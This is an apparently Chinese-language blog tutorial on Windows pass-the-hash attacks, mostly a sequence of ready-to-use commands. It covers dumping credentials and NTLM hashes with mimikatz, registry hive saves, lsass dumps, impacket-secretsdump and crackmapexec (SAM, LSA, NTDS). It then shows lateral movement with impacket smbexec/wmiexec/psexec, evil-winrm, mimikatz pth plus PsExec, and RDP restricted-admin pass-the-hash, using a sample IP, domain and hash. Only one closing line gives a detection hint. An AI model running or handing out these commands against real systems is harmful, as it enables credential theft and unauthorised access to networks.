一、简介
- 本文为对哈希传递攻击手法的补充。
- 前文:传送门
NTLM认证流程

二、哈希提取
2.1 mimikatz
- 提取哈希输入到
hash.txt文件中mimikatz.exe privilege::debug "sekurlsa::logonpasswords" exit > hash.txt

2.2 注册表提取
- 依赖工具:
impacket-secretsdump - 提取SAM数据库及解密信息
reg save hklm\sam sam.hivereg save hklm\system system.hive

- 解密
SAM数据库impacket-secretsdump -sam sam.hive -system system.hive LOCAL

2.3 进程转储
- 任务管理器==> 详细信息 ==>
lsass.exe==> 创建转储文件

- 转储文件解析
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" exit >hash.txt

2.4 Crackmapexec
- 远程提取
SAMcrackmapexec smb IP -u username -p password --sam

- 远程提取
LSAcrackmapexec smb IP -u username -p password --lsa- 注:
LSA参考:传送门

2.5 NTDS提取
- 本地提取:传送门
- 远程提取
crackmapexec smb IP -u username -p password --ntds

三、哈希传递
3.1 smbexec
-
补充:直接使用将导致乱码,请加上
-codec gbk,以此解决命令无法解析的问题! -
格式:
python3 smbexec.py domain/user@ip -hashes :hash -codec gbk -
impacket-smbexec tech.com/administrator@192.168.30.227 -hashes :224b59e02691d9be47ee26ca2313c1d2 -
取得账户权限为:
system

3.2 wmiexec
-
格式:
python3 wmiexec.py domain/user@ip -hashes :hash -codec gbk -
impacket-wmiexec tech.com/administrator@192.168.30.227 -hashes :224b59e02691d9be47ee26ca2313c1d2 -
取得账户权限为:
认证账户

3.3 psexec
- 格式:
python3 psexec.py domain/user@ip -hashes :hash -codec gbk impacket-psexec tech.com/administrator@192.168.30.227 -hashes :224b59e02691d9be47ee26ca2313c1d2- 取得账户权限为:
system

3.4 winrm
-
格式:
evil-winrm -i TargetIP -u username -H hash -
evil-winrm -i 192.168.30.227 -u administrator@tech.com -H 224b59e02691d9be47ee26ca2313c1d2 -
取得账户权限为:
认证账户

3.5 mimikatz
mimikatz联合`PSTools``- 开启特殊会话窗口:
mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:tech.com /ntlm:224b59e02691d9be47ee26ca2313c1d2" - 于自动开启的窗口中使用
PSTools-PSexec:PsExec.exe \\192.168.30.227 cmd - 补充:

3.6 RDP
-
我们可以使用
RDP工具执行RDP PTH攻击,以获得对目标系统的GUI访问权限xfreerdp -
但是需要启用受限管理模式以允许
PTH,否则无法通过RDP访问目标主机 -
注意:受限管理模式默认关闭,所以需要额外配置才能通过
PTH的方式通过RDP访问目标 -
开启受限模式
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f- 注:开启受限模式注册表,仅需普通账户权限即可
-
PTH
xfreerdp /v:192.168.30.227 /u:administrator /pth:224b59e02691d9be47ee26ca2313c1d2

四、溯源
- 事件特征:登录账户为特权账户或高权限账户,但使用者信息为空
